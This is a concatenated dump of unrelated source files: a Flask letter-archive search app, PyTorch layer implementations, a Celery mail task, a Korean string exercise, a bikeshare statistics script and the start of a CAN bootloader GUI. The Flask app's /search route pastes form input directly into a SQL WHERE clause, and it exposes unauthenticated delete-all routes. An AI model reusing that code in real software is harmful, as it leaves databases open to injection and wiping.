keterangan\",\n \"children\": []\n },\n {\n \"name\": \"Surat pernyataan\",\n \"children\": []\n },\n {\n \"name\": \"Pengumuman\",\n \"children\": []\n },\n {\n \"name\": \"Laporan\",\n \"children\": []\n },\n {\n \"name\": \"Notula\",\n \"children\": []\n }\n ]\n }\n ]\n}\n\n@app.route('/')\ndef home():\n RESULTS[\"children\"][3][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][3][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][1][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][7][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][8][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][6][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][5][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][3][\"children\"] = []\n query = dao_rnn.getAllData()\n return render_template('index.html', query=query)\n\n@app.route('/search', methods=['POST'])\ndef search():\n condition = 'where '+request.form['condition']+' like \\'%'+request.form['query']+'%\\''\n print(condition)\n query = dao_rnn.getData(condition)\n print(query[0][6])\n RESULTS[\"children\"][3][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][3][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][1][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][7][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][8][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][6][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][5][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][3][\"children\"] = []\n \n for i in range(len(query)):\n if query[i][6] == 'Nota Dinas':\n RESULTS[\"children\"][3][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Nota Kesepahaman':\n RESULTS[\"children\"][4][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Berita Acara':\n RESULTS[\"children\"][4][\"children\"][3][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Dinas':\n RESULTS[\"children\"][3][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Edaran':\n RESULTS[\"children\"][0][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Instruksi':\n RESULTS[\"children\"][2][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Keputusan':\n RESULTS[\"children\"][1][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Keterangan':\n RESULTS[\"children\"][4][\"children\"][4][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Kuasa':\n RESULTS[\"children\"][4][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Laporan':\n RESULTS[\"children\"][4][\"children\"][7][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Memo':\n RESULTS[\"children\"][3][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Notula':\n RESULTS[\"children\"][4][\"children\"][8][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pengantar':\n RESULTS[\"children\"][3][\"children\"][4][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pengumuman':\n RESULTS[\"children\"][4][\"children\"][6][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Peraturan':\n RESULTS[\"children\"][0][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Perintah':\n RESULTS[\"children\"][2][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Perjanjian Kerjasama':\n RESULTS[\"children\"][4][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pernyataan':\n RESULTS[\"children\"][4][\"children\"][5][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Prosedur':\n RESULTS[\"children\"][0][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Tugas':\n RESULTS[\"children\"][2][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Undangan':\n RESULTS[\"children\"][3][\"children\"][3][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n\n return render_template('index.html', query=query)\n\n@app.route('/datasearch')\ndef datasearch():\n return jsonify(RESULTS)\n\n@app.route('/raw-pdf/')\ndef download_file(filename):\n return send_from_directory('./raw-pdf/', filename)\n\n@app.route('/delete/')\ndef delete(id):\n dao_rnn.deleteData(id)\n return redirect('/')\n\n@app.route('/deleteall')\ndef deleteAll():\n dao_rnn.deleteAllData()\n return redirect('/')\n\n# @app.route('/user/')\n# def profile(username):\n# return '{}\\'s profile'.format(username)\n\n# with app.test_request_context():\n# print(url_for('hello'))\n# print(url_for('login'))\n# print(url_for('login', next='/'))\n# print(url_for('profile', username='John Doe'))\n\nif __name__ == '__main__':\n app.debug = True\n app.run()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":11570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"584390909","text":"import torch\nimport numpy as np\n\nfrom nn.base import Module\n\n\nclass FullyConnectedLayer(Module):\n \"\"\"\n Слой, осуществляющий линейное преобразование: Y = X @ W + b, Y \\in R^{N x n_out}, X \\in R^{N, n_in}.\n\n Атрибуты\n --------\n `W` : torch.tensor, shape=(in_features, out_features)\n Матрица размера (in_features, out_features), где в данном случае in_features равно числу признаков,\n а out_features равно количеству нейронов в слое.\n `b` : torch.tensor, shape=(N, out_features)\n Вектор свободных членов, по одному числу на один нейрон.\n `gradW` : torch.tensor, shape=(in_features, out_features)\n Хранит градиент матрицы весов линейного слоя.\n `gradb` : torch_tensor, shape=(N, out_features)\n Хранит градиент вектора свободных членов.\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True, init=None):\n \"\"\"\n Параметры\n ---------\n `in_features` : integer\n Число фич у входа слоя.\n `out_features` : integer\n Число фич у выхода слоя.\n `bias` : boolean\n Нужен ли bias?\n `init` : torch.tensor с shape=(in_features, out_features)\n Содержит значения, которыми инициализируются веса слоя. Заметим, что в реализации pytorch\n bias не инициализируется извне, у нас тоже не будет.\n \"\"\"\n super(FullyConnectedLayer, self).__init__()\n self.b = None\n self.W = None\n\n if init is not None:\n self.W = init.clone().detach()\n else:\n stdv = 1. / np.sqrt(in_features)\n self.W = torch.tensor(np.random.uniform(-stdv, stdv, size=(in_features, out_features)), dtype=torch.float)\n if bias:\n self.b = torch.tensor(np.random.uniform(-stdv, stdv, size=out_features), dtype=torch.float)\n\n self.gradW = torch.full((out_features, in_features), fill_value=0., dtype=torch.float)\n self.gradb = torch.full((1, out_features), fill_value=0., dtype=torch.float)\n\n def forward(self, module_input):\n self.output = torch.matmul(module_input, self.W)\n if self.b is not None:\n self.output += self.b\n\n return self.output\n\n def zero_grad(self):\n self.gradW.fill_(0.)\n self.gradb.fill_(0.)\n\n def update_module_input_grad(self, module_input, grad_output):\n self.grad_input = torch.matmul(grad_output, self.W.t())\n return self.grad_input\n\n def update_params_grad(self, module_input, grad_output):\n self.gradW = torch.matmul(module_input.t(), grad_output)\n if self.b is not None:\n self.gradb = torch.sum(grad_output, dim=0)\n\n @property\n def parameters(self):\n return [self.W, self.b]\n\n @property\n def grad_params(self):\n return [self.gradW, self.gradb]\n\n # def apply_grad(self):\n # raise NotImplementedError\n\n\nclass Softmax(Module):\n \"\"\"Осуществляет softmax-преобразование. Подробности по формулам см. в README.md.\"\"\"\n\n def forward(self, module_input):\n # Нормализуем для численной устойчивости, а потом возводим в exp\n self.output = torch.exp(module_input - module_input.max(dim=1, keepdim=True).values)\n self.output /= self.output.sum(dim=1, keepdim=True)\n\n return self.output\n\n # TODO: попробовать сделать без циклов, но это непросто.........\n def update_module_input_grad(self, module_input, grad_output):\n # Нужно проиницилизировать self.grad_input, так как дальше берутся уже индексы\n if self.grad_input is None:\n self.grad_input = torch.zeros(size=self.output.shape)\n\n for i in range(self.output.shape[0]):\n softmax_i = self.output[i, :].unsqueeze(1)\n partial_softmax = -torch.matmul(softmax_i, softmax_i.t()) + torch.diag(softmax_i.squeeze())\n for j in range(self.output.shape[1]):\n self.grad_input[i, j] = torch.dot(grad_output[i, :], partial_softmax[:, j])\n\n return self.grad_input\n\n\nclass LogSoftmax(Module):\n \"\"\"Осуществляет log(softmax)-преобразование. Подробности по формулам см. в README.md.\"\"\"\n\n def forward(self, module_input):\n # Нормализуем для численной устойчивости\n self.output = module_input - module_input.max(axis=1, keepdim=True).values\n self.output = self.output - torch.log(torch.sum(torch.exp(self.output), dim=1, keepdim=True))\n\n return self.output\n\n def update_module_input_grad(self, module_input, grad_output):\n # Нормализуем для численной устойчивости, а потом уже возводим в exp\n exp_module_input = torch.exp(module_input - module_input.max(axis=1, keepdim=True).values)\n softmax = exp_module_input / torch.sum(exp_module_input, dim=1, keepdim=True)\n\n self.grad_input = grad_output - torch.mul(softmax, torch.sum(grad_output, dim=1, keepdim=True))\n\n return self.grad_input\n","sub_path":"nn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198785135","text":"\nfrom app import mail,celery\nfrom flask_mail import Message\nimport os\nfrom run import app\nfrom flask import current_app,render_template\n\n\n@celery.task\ndef send_async_mail(to, subject, html_tem=None, accessory_path=None, **kwargs):\n with app.app_context():\n msg = Message(\n subject=subject,\n sender=current_app.config.get(\"MAIL_DEFAULT_SENDER\",None),\n recipients=[to]\n )\n msg.html = render_template(html_tem+\".html\",**kwargs)\n # accessory_path 资源路径\n with current_app.open_resource(accessory_path) as fp:\n msg.attach(os.path.basename(accessory_path), \"image/png\", fp.read())\n\n mail.send(msg)\n\n\n@celery.task\ndef sum(a,b):\n print(a+b)\n return a+b","sub_path":"tools/mail_tools.py","file_name":"mail_tools.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187944328","text":"'''\n다음과 같이 사용자가 입력한 문장에서 대소문를 구별해 각각의 갯수를 출력하는 프로그램을 작성하십시오.\n'''\n\ninput_str = input()\n\ntext = {\n \"UPPER CASE\": 0,\n \"LOWER CASE\": 0\n}\n\nfor i in input_str:\n if i.isalpha():\n if i.isupper():\n text[\"UPPER CASE\"] += 1\n elif i.islower():\n text[\"LOWER CASE\"] += 1\n\nfor key in text:\n print(\"{} {}\".format(key,text[key]))","sub_path":"PYTHON/파이썬_프로그래밍_기초_문제풀이/13/13-07.py","file_name":"13-07.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"405201278","text":"# Importing required libraries\nimport time\nimport pandas as pd\nimport datetime\n\n# City data dictionary\nCITY_DATA = {'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv'}\n\n# Days in chronological order\ndays_dict = {'mon': 'Monday', 'tue': 'Tuesday', 'wed': 'Wednesday', 'thu': 'Thursday', 'fri': 'Friday',\n 'sat': 'Saturday', 'sun': 'Sunday', 'all': 'No filters'}\n\n# Months in chronological order\nmonth_dict = {'jan': 'January', 'feb': 'February', 'mar': 'March', 'apr': 'April', 'may': 'May', 'jun': 'June',\n 'all': 'No filters'}\n\n\n# Function to confirm a user's input\ndef confirm_input():\n while True:\n answer = str(input(\"Please confirm your input\\nEnter 'y' to continue or 'n' to restart:\\n\").strip().lower())\n if answer not in (\"y\", \"n\"):\n print(\"\\nInvalid Response. Please try again\")\n continue\n elif answer == \"y\":\n break\n else:\n get_filters()\n\n\n# Function to filter data by user's input\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print()\n print('-' * 44)\n print('Hello! Let\\'s explore some US bikeshare data!')\n print('-' * 44)\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n print()\n while True:\n city = (input(\"Which city do you want to select bikeshare data from?\\nPlease enter either 'Chicago', \"\n \"'New York City' or 'Washington'\\n\")).strip().lower()\n if city in [\"chicago\", \"new york city\", \"washington\"]:\n break\n else:\n print(\"\\nInvalid input!!! Trying again...\")\n\n # get user input for month (all, january, february, ... , june)\n print()\n while True:\n month = (input(\"From January to June, which Month do you want to filter the bikeshare data by?\\nPlease enter \"\n \"'Jan', 'Feb', 'Mar', 'Apr', 'May' or 'Jun' to represent each of the months.\\nEnter 'all' \"\n \"to apply no month filter\\n\")).strip().lower()\n if month in [\"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\", \"all\"]:\n break\n else:\n print(\"\\nInvalid input!!! Trying again\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n print()\n while True:\n day = (input(\"What day of the week do you want to filter the bikeshare data by?\\nPlease enter 'Mon', 'Tue', \"\n \"'Wed', 'Thu', 'Fri', 'Sat' or 'Sun' to represent the day of the week.\\nEnter 'all' to apply no \"\n \"day filter\\n\")).strip().lower()\n if day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\", \"all\"]:\n break\n else:\n print(\"\\nInvalid input!!! Trying again...\")\n\n print(\"\\nYour inputs are..\\n\\tCity : {}\\n\\tMonth : {}\\n\\tDay : {}\\n\"\n \"\".format(city.capitalize(), month_dict[month], days_dict[day]))\n confirm_input()\n\n print('-' * 48)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # loading city data file into a data frame\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime type\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract Month from the Start Time column to create month column\n df['Month'] = df['Start Time'].dt.month\n\n # extract day of week from the Start Time column to create day of week column\n df['Day_of_Week'] = df['Start Time'].dt.day_name()\n\n # extract hour from the Start Time column to create hour column\n df['Hour'] = df['Start Time'].dt.hour\n\n # Filtering by month if user enters a month other than 'all'\n if month != 'all':\n # Listing months in chronological order\n months = [\"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\"]\n\n # Month converted to numbers\n month = months.index(month) + 1\n\n # Filtering by month to create new data frame\n df = df[df['Month'] == month]\n\n # Filtering by month if user enters a day other than 'all'\n if day != 'all':\n # filter by day of week to create the new data frame\n df = df[df['Day_of_Week'] == days_dict[day]]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n popular_month = df['Month'].mode()[0]\n month_int_dict = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June'}\n print('\\t1. Most Common Month:', month_int_dict[popular_month])\n\n # display the most common day of week\n popular_day = df['Day_of_Week'].mode()[0]\n print('\\t2. Most Common Day of Week:', popular_day)\n\n # display the most common start hour\n popular_hour = df['Hour'].mode()[0]\n print('\\t3. Most Common Start Hour:', popular_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n start_station = df['Start Station'].mode()[0]\n print('\\t1. Most commonly used start station:', start_station)\n\n # display most commonly used end station\n end_station = df['End Station'].mode()[0]\n print('\\t2. Most commonly used end station:', end_station)\n\n # display most frequent combination of start station and end station trip\n df['Start-End Combination'] = (df['Start Station'] + ' - ' + df['End Station'])\n start_end_comb = df['Start-End Combination'].mode()[0]\n print('\\t3. Most frequent combination of start station and end station trip:', str(start_end_comb))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n sum_travel_time = df['Trip Duration'].sum()\n\n # support type for timedelta seconds component\n total_travel_time = sum_travel_time.astype('float64', copy=False)\n\n # convert time to timedelta object\n converted_time = datetime.timedelta(seconds=total_travel_time)\n\n # display total travel time in time delta format\n print('\\t1. Total travel time is as follows: \\n\\t\\tin seconds ==> {} seconds\\n\\t\\tin time delta format ==> {}'.\n format(str(total_travel_time), str(converted_time)))\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n\n # convert time to timedelta object\n mean_converted_time = datetime.timedelta(seconds=mean_travel_time)\n print('\\n\\t2. Mean travel time is as follows: \\n\\t\\tin seconds ==> {} seconds\\n\\t\\tin time delta format ==> {}'.\n format(str(mean_travel_time), str(mean_converted_time)))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df, city):\n \"\"\"\n Displays statistics on bikeshare users.\n\n Args:\n df - Pandas DataFrame containing city data filtered by month and day\n (str) city - name of the city to analyze\n \"\"\"\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_type_count = df[\"User Type\"].value_counts().to_string()\n # Splitting the user types data into array for desired output format\n user_type_array = user_type_count.split()\n print(\"\\t1. Counts of users' type is as follows:\\n\\t\\t\\t{} : {} counts\\n\\t\\t\\t{} : {} \"\n \"counts\".format(user_type_array[0], user_type_array[1], user_type_array[2], user_type_array[3]))\n\n # Display counts of gender\n if \"Gender\" in df.columns:\n gender_count = df[\"Gender\"].value_counts().to_string()\n # Splitting the users' gender data into array for desired output format\n user_gender_array = gender_count.split()\n\n # Counting null values in Gender\n nan_total = df[\"Gender\"].isna().sum()\n\n print(\"\\n\\t2.Counts of users' gender is as follows:\\n\\t\\t\\t{} : {} counts\\n\\t\\t\\t{} : {} counts\\n\\t\\tNote: \"\n \"there were {} NaN data values in the 'Gender' column\".format(user_gender_array[0], user_gender_array[1],\n user_gender_array[2], user_gender_array[3],\n nan_total))\n else:\n print(\"\\n\\t2. {} has no data for users' gender\".format((str(city)).capitalize()))\n\n # Display earliest, most recent, and most common year of birth\n if \"Birth Year\" in df.columns:\n earliest_year = df['Birth Year'].min()\n most_recent_year = df['Birth Year'].max()\n most_common_year = df['Birth Year'].mode()[0]\n print('\\n\\t3. Earliest year of birth:', int(earliest_year))\n print('\\t4. Most recent year of birth:', int(most_recent_year))\n print('\\t5. Most common year of birth:', int(most_common_year))\n\n else:\n print(\"\\t3. {} has no data for users' year of birth\".format((str(city)).capitalize()))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef show_raw_data(df):\n response = input(\"\\nWould you like to see individual raw data? Enter 'yes' or 'no'\\n\").lower()\n # Catch if a user enters just 'y' as earlier used in code\n if response in (\"yes\", \"y\"):\n i = 0\n\n while True:\n # Printing from lower limit to length of dataframe rows if 'i' is out of bounds\n if i + 5 > len(df.index) - 1:\n print(df.iloc[i:len(df.index), :])\n print(\"You've reached the end of the rows\")\n break\n\n # Printing the dataframe in a set of 5 rows if 'i' is not out of bounds\n print(df.iloc[i:i + 5, :])\n i += 5\n\n # Asking to show more rows in 5\n response_show_next_five = input(\"\\nWould you like to see the next 5 rows? Enter 'yes' or \"\n \"'no'\\n\").strip().lower()\n # Catch if a user enters just 'y' as earlier used in code\n if response_show_next_five not in (\"yes\", \"y\"):\n break\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df, city)\n show_raw_data(df)\n #\n restart = input(\"\\nWould you like to restart? Enter 'y' to restart or any other character \"\n \"to exit the program.\\n\")\n if restart.lower() not in ('yes', 'y'):\n break\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":11645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537490565","text":"import tkinter as tk\nfrom tkinter import ttk, Menu, filedialog, messagebox\nimport datetime\nfrom threading import Thread\nimport os\nfrom ctypes import *\nfrom CANLoaderController import CANLoaderController, CANLoaderFirmwareVerifyException, CANLoaderDeviceFailureException\nimport queue\nfrom CANFoxLib import CANFoxLibSkin, CANfoxException, CANfoxHardwareException\nfrom enum import *\nimport settings\nimport platform\nimport CANTypeDefs\nfrom ThreadCANMsgReader import ThreadCANMsgReader\n\nif platform.architecture()[0] == '32bit':\n from sieca132_client_x32 import sieca132_client\nelse:\n from sieca132_client_x64 import sieca132_client\n\nimport CANLoaderAbout\n\n\nclass te_OperationState(Enum):\n os_BEGIN = 0\n os_END = 1\n\n def __int__(self):\n return self.value\n\n\nclass WorkingAction(Enum):\n wa_INIT = 0\n wa_NONE = 1\n wa_PROGRAMMING = 2\n wa_VERIFYING = 3\n wa_DEVICE_READING = 4\n wa_ERROR = 5\n wa_HARDWARE_ERROR = 6\n\n def __int__(self):\n return self.value\n\nclass te_CurrentDeviceBootloaderState(Enum):\n bs_InBootloader = 0\n bs_Unknown = 1\n\n def __int__(self):\n return self.value\n\n\nclass MainApplication(tk.Frame):\n def __init__(self, master=None):\n self.master = master\n tk.Frame.__init__(self, master)\n self.QueueProgressBar = queue.Queue(10)\n self.QueueThreadProgrammingService = queue.Queue(1)\n self.QueueThreadVerifyingService = queue.Queue(1)\n self.QueueThreadReadingService = queue.Queue(1)\n self.QueueIncomingMessages = queue.Queue(100)\n self.__can_hasReprogrammableDevices = False\n self.__workingAction = WorkingAction.wa_NONE\n self.init_window()\n\n def key(self, event):\n kp = event.char\n esc_key = chr(0x1b)\n if kp == esc_key:\n {\n WorkingAction.wa_NONE: lambda: None,\n WorkingAction.wa_PROGRAMMING: lambda: self.QueueThreadProgrammingService.put(\"exit\") if (messagebox.askyesno(\"Cancel programming?\")) else None,\n WorkingAction.wa_VERIFYING: lambda: self.QueueThreadVerifyingService.put(\"exit\") if (messagebox.askyesno(\"Cancel verifying?\")) else None,\n WorkingAction.wa_DEVICE_READING: lambda: self.QueueThreadReadingService.put(\"exit\") if (messagebox.askyesno(\"Cancel reading?\")) else None,\n WorkingAction.wa_ERROR: lambda: None,\n WorkingAction.wa_HARDWARE_ERROR: lambda: None\n\n }[self.__workingAction]()\n\n def __enable_find_controls__(self):\n self.__enable_controls__(self.frameCanDevice)\n self.buttonLeaveBootloader.configure(state='disable')\n self.buttonLock.configure(state='disable')\n self.buttonCanConnect.configure(state='disable')\n return\n\n def __disable_controls__(self, parent):\n for child in parent.winfo_children():\n try:\n child.configure(state='disable')\n except Exception as e:\n continue\n return\n\n def __enable_controls__(self, parent):\n for child in parent.winfo_children():\n try:\n child.configure(state='normal')\n except Exception as e:\n continue\n return\n\n def __enable_controls_programming__(self):\n if hasattr(self, 'reprogrammable_devices') and len(self.reprogrammable_devices) != 0:\n if os.path.exists(self.flashFilePath.get()) and os.path.getsize(str(self.flashFilePath.get())) > 0:\n self.__enable_controls__(self.frameProgramming)\n self.entryFlashFile.configure(state=\"disable\")\n if hasattr(self, 'CurrentDeviceBootloaderState') and self.CurrentDeviceBootloaderState == te_CurrentDeviceBootloaderState.bs_InBootloader:\n self.buttonLeaveBootloader.configure(state=\"normal\")\n self.buttonLock.configure(state=\"normal\")\n else:\n self.buttonLeaveBootloader.configure(state=\"disable\")\n self.buttonLock.configure(state=\"disable\")\n self.buttonReadFlash.configure(state='normal')\n self.buttonSelectFlashFile.configure(state='normal')\n else:\n self.labelStatus['text'] = \"None\"\n self.labelStatus.config(bg=\"gray\")\n self.entryNodeIDText.set(\"\")\n self.entryMCUInfoText.set(\"\")\n self.__disable_controls_programming__()\n return\n\n def __disable_controls_programming__(self):\n self.__disable_controls__(self.frameProgramming)\n self.buttonLeaveBootloader.configure(state=\"disable\")\n self.buttonLock.configure(state=\"disable\")\n return\n\n def __enable_controls_device__(self):\n self.__enable_controls__(self.frameFoundCanDevices)\n self.__enable_controls__(self.frameCanDevice)\n self.comboboxFoundCanDevices.configure(state=\"readonly\")\n self.buttonCanConnect.config(state=\"disabled\")\n return\n\n def __disable_controls_device__(self):\n self.__disable_controls__(self.frameCanDevice)\n self.__disable_controls__(self.frameFoundCanDevices)\n self.buttonFind.config(state=\"disabled\")\n return\n\n def __reset_all_controls__(self):\n self.__disable_controls__(self.frameCanDevice)\n self.__disable_controls__(self.frameFoundCanDevices)\n self.buttonFind.config(state=\"normal\")\n self.buttonCanConnect.config(state=\"normal\")\n\n def __switch_controls__(self, operation_state):\n if operation_state == te_OperationState.os_BEGIN:\n {\n WorkingAction.wa_INIT: lambda: self.__reset_all_controls__(),\n WorkingAction.wa_NONE: lambda: self.__disable_controls_programming__(),\n WorkingAction.wa_PROGRAMMING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_VERIFYING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_DEVICE_READING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_ERROR: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_HARDWARE_ERROR: lambda: (self.__reset_all_controls__())\n }[self.__workingAction]()\n else:\n {\n WorkingAction.wa_INIT: lambda: self.__reset_all_controls__(),\n WorkingAction.wa_NONE: lambda: (self.__enable_controls_device__(), self.__enable_controls_programming__()),\n WorkingAction.wa_PROGRAMMING: lambda: None,\n WorkingAction.wa_VERIFYING: lambda: None,\n WorkingAction.wa_DEVICE_READING: lambda: None,\n WorkingAction.wa_ERROR: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__(), self.__enable_find_controls__()),\n WorkingAction.wa_HARDWARE_ERROR: lambda: (self.__reset_all_controls__())\n 